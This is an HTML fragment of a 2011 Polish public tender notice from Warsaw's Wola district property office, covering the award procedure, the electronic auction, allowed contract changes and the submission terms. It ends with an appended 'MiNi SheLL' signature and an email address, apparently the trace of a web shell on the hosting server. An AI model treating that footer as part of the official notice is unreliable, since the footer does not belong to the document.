<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: http://aukcje.um.warszawa.pl</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	możliwość zmiany obmiaru prac w ramach zakresu prac objętych przedmiotem zamówienia oraz w ramach wynagrodzenia,
b)	możliwość zmiany miejsca (adresu) wykonywania zakresu umowy w ramach wynagrodzenia,
c)	możliwość zmian osób biorących udział w realizacji zamówienia, w przypadku zaistnienia zdarzeń losowych, pod warunkiem wykazania przez Wykonawcę,                   że nowo wskazane osoby posiadają wymagane kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia, 	
d)	możliwość zmiany podwykonawcy, w przypadku rozwiązania umowy łączącej go z Wykonawcą, jego likwidacji lub nienależytej staranności przy realizacji robót stwierdzonej przez Zamawiającego, pod warunkiem wykazania przez nowego podwykonawcę spełniania warunków w zakresie nie mniejszym niż dotychczasowy podwykonawca, wskazany na etapie postępowania o zamówienie publiczne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnwola.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W termi. 5 dni w siedz. Zam. pok. 19, pon-pt. 12:00-14:00, po dok. przelewu należnej opłaty na konto Zam. 25103050800000005550882019, za zal. poczt. lub w kasie Zakładu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2011 godzina 09:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Wola m. st. Warszawy Warszawa, ul. Bema 70 pok. nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com